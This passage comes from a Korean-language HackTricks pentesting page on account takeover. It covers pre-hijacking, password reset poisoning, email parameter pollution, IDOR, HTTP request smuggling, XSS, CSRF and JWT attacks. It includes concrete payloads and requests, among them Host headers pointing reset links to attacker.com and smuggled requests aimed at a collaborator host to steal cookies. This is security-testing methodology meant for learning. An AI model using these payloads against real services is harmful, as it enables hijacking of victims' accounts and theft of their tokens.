def handleResponse(req, interesting): if req.status != 401 and b’Invalid’ not in req.response: table.add(req)

</details>

- Try racing verification: 동일한 유효한 OTP를 두 세션에서 동시에 제출하세요; 경우에 따라 한 세션은 확인된 공격자 계정이 되고 피해자 흐름도 성공할 수 있습니다.
- 또한 verification 링크에서 Host header poisoning을 테스트하세요(아래의 reset poisoning과 동일). 공격자가 제어하는 호스트에서 verification을 leak하거나 완료할 수 있는지 확인합니다.

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (before the victim signs up)

공격자가 피해자가 계정을 생성하기 전에 피해자의 이메일에 대해 조작을 수행하고, 이후에 다시 접근 권한을 획득하는 경우 강력한 취약점 클래스가 발생합니다.

Key techniques to test (adapt to the target’s flows):

- Classic–Federated Merge
  - 공격자: 피해자 이메일로 classic 계정을 등록하고 비밀번호를 설정합니다.
  - 피해자: 이후 동일 이메일로 SSO로 가입합니다.
  - 불안전한 병합은 양쪽이 모두 로그인된 상태로 남거나 공격자의 접근이 부활할 수 있습니다.
- Unexpired Session Identifier
  - 공격자: 계정을 생성하고 장기 세션을 유지합니다(로그아웃하지 않음).
  - 피해자: 비밀번호를 복구/설정하고 계정을 사용합니다.
  - 리셋이나 MFA 활성화 후에도 이전 세션이 유효한지 확인하세요.
- Trojan Identifier
  - 공격자: 미리 생성된 계정에 2차 식별자(전화번호, 추가 이메일 또는 공격자의 IdP 연동)를 추가합니다.
  - 피해자: 비밀번호를 재설정합니다; 이후 공격자가 trojan identifier를 사용해 재설정/로그인합니다.
- Unexpired Email Change
  - 공격자: 이메일 변경을 공격자 메일로 시작하고 확인을 보류합니다.
  - 피해자: 계정을 복구하고 사용하기 시작합니다.
  - 공격자: 이후 보류 중인 이메일 변경을 완료해 계정을 탈취합니다.
- Non‑Verifying IdP
  - 공격자: 이메일 소유권을 검증하지 않는 IdP를 사용해 `victim@…`을 주장합니다.
  - 피해자: classic 경로로 가입합니다.
  - 서비스가 `email_verified`를 확인하거나 로컬 검증을 수행하지 않고 이메일 기반 병합을 하면 문제가 발생합니다.

Practical tips

- web/mobile 번들에서 흐름과 엔드포인트를 수집하세요. classic signup, SSO linking, email/phone change, password reset 엔드포인트를 찾아보세요.
- 다른 흐름을 테스트하는 동안 세션을 유지하도록 현실적인 자동화를 만드세요.
- SSO 테스트의 경우, 테스트용 OIDC provider를 준비하고 피해자 주소의 `email` 클레임과 `email_verified=false`인 토큰을 발급해 RP가 미검증 IdP를 신뢰하는지 확인하세요.
- 비밀번호 재설정이나 이메일 변경 후에는 다음을 확인하세요:
  - 모든 다른 세션과 토큰이 무효화되는지,
  - 보류 중인 이메일/전화번호 변경 기능이 취소되는지,
  - 이전에 연동된 IdPs/이메일/전화번호가 재검증되는지.

Note: Extensive methodology and case studies of these techniques are documented by Microsoft’s pre‑hijacking research (see References at the end).

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. 자신의 이메일 주소로 password reset을 요청합니다.
2. password reset 링크를 클릭합니다.
3. 비밀번호를 변경하지 않습니다.
4. 임의의 제3자 웹사이트(예: Facebook, twitter)를 클릭합니다.
5. Burp Suite 프록시에서 요청을 가로챕니다.
6. referer 헤더가 password reset token을 leak하고 있는지 확인합니다.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Burp Suite에서 password reset 요청을 가로챕니다.
2. Burp Suite에서 다음 헤더를 추가하거나 편집합니다: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. 수정한 헤더로 요청을 전달합니다\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. _host header_를 기반으로 한 password reset URL(예: `https://attacker.com/reset-password.php?token=TOKEN`)이 생성되는지 확인합니다.

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

API 파라미터에서의 IDOR

1. 공격자는 자신의 계정으로 로그인하여 Change password 기능으로 이동해야 합니다.
2. Burp Suite를 실행하고 요청을 Intercept 하세요
3. Repeater 탭으로 전송한 뒤 파라미터를 수정하세요 : User ID/email
   powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

약한 비밀번호 재설정 토큰

비밀번호 재설정 토큰은 매번 무작위로 생성되고 고유해야 합니다.
토큰이 만료되는지 또는 항상 동일한지 확인해보세요. 일부 경우 생성 알고리즘이 약해서 추측될 수 있습니다. 알고리즘에 사용될 수 있는 변수는 다음과 같습니다.

• 타임스탬프
• UserID
• 사용자 이메일
• 이름과 성
• 생년월일
• 암호화
• 숫자만
• 작은 토큰 시퀀스 ( 문자는 [A-Z,a-z,0-9] 사이)
• 토큰 재사용
• 토큰 만료 날짜

Leaking 비밀번호 재설정 토큰

1. 특정 이메일에 대해 API/UI를 사용해 비밀번호 재설정 요청을 트리거합니다. 예: test@mail.com
2. 서버 응답을 검사하고 resetToken을 확인하세요
3. 그런 다음 토큰을 다음과 같은 URL에 사용하세요: https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

사용자명 충돌을 통한 비밀번호 재설정

1. 피해자와 동일한 사용자명으로 시스템에 등록하되 사용자명 앞뒤에 공백을 추가합니다. 예: "admin "
2. 악의적인 사용자명으로 비밀번호 재설정을 요청하세요.
3. 자신의 이메일로 전송된 토큰을 사용해 피해자의 비밀번호를 재설정하세요.
4. 새 비밀번호로 피해자 계정에 로그인하세요.

CTFd 플랫폼은 이 공격에 취약했습니다.
See: CVE-2020-7245

Cross Site Scripting을 통한 계정 탈취

1. 애플리케이션 내부나 서브도메인에서 XSS를 찾습니다. (쿠키가 상위 도메인으로 스코프된 경우: *.domain.com)
2. 현재 sessions cookie를 leak 하세요
3. 해당 쿠키로 사용자로 인증하세요

HTTP Request Smuggling을 통한 계정 탈취

1. HTTP Request Smuggling의 유형(C L, TE, CL.TE)을 탐지하기 위해 smuggler를 사용하세요
   powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
2. 다음 데이터로 POST / HTTP/1.1을 덮어쓸 요청을 조작하세요:
   GET http://something.burpcollaborator.net HTTP/1.1 X: — 목표는 피해자를 burpcollab으로 open redirect 시켜 쿠키를 훔치는 것입니다\
3. 최종 요청은 다음과 같이 보일 수 있습니다

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone에서 이 버그를 악용한 보고서\

• https://hackerone.com/reports/737140\
• https://hackerone.com/reports/771666

CSRF를 통한 계정 탈취

1. CSRF용 payload를 생성합니다. 예: “HTML form with auto submit for a password change”
2. payload를 전송합니다.

JWT를 통한 계정 탈취

JSON Web Token은 사용자 인증에 사용될 수 있습니다.

• JWT의 User ID / Email을 다른 것으로 수정합니다.
• 약한 JWT 서명 여부를 확인합니다.

JWT Vulnerabilities (Json Web Tokens)

Registration-as-Reset (기존 이메일에 대한 Upsert)

일부 signup 핸들러는 제공된 email이 이미 존재할 경우 upsert를 수행합니다. 만약 endpoint가 email과 password만 포함한 최소한의 body를 허용하고 소유권 확인을 강제하지 않는다면, 피해자의 email을 전송하여 인증 이전에 그들의 password를 덮어쓸 수 있습니다.

• 탐지: bundled JS(또는 모바일 앱 트래픽)에서 endpoint 이름을 수집한 다음, ffuf/dirsearch를 사용해 /parents/application/v4/admin/FUZZ 같은 기본 경로를 fuzz합니다.
• 단서: GET이 “Only POST request is allowed.” 같은 메시지를 반환하면 종종 올바른 HTTP verb와 JSON body가 기대된다는 의미입니다.
• 실제에서 관찰된 최소 body:

{"email":"victim@example.com","password":"New@12345"}

예제 PoC:

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

영향: reset token, OTP 또는 이메일 검증 없이 Full Account Takeover (ATO) 가능.

References

• How I Found a Critical Password Reset Bug (Registration upsert ATO)
• Microsoft MSRC – Pre‑hijacking attacks on web user accounts (May 2022)
• https://salmonsec.com/cheatsheet/account_takeover
• Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy (NDSS 2026 paper & dataset)

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 계획 확인하기!
• **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
• HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.